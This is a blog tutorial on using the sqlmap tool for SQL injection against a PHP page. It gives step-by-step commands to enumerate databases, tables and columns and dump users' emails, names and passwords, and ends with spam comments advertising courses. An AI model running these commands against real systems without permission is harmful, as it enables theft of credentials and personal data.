SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u www.site.com/product.php?catid=5 – -dbs
when sqlmap is done, it will tell you the Mysql version and some other information about the database.
At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables
The result should be something like this :
Database: acuart
Database: acuart
[8 tables]
+———–+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+———–+
+———–+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+———–+
Now we have a list of tables , we need to get columns so we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users –columns
The result should be like this :
last step we need to get data from columns , so the final command will look like this.
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump
and here’s the final result : we have got the name, mail and password:
Useful Information..!!! Best blog with effective information’s..!!
ReplyDeleteweb designing training in chennai
PHP Course in Chennai
PHP Course in Bangalore
Best Spoken English Classes in Chennai
Best Spoken English Classes in Bangalore
German Language Course in Chennai
German Language Course in Bangalore
Salesforce Course in Chennai
IELTS Coaching centre in Chennai
IELTS Coaching center in Bangalore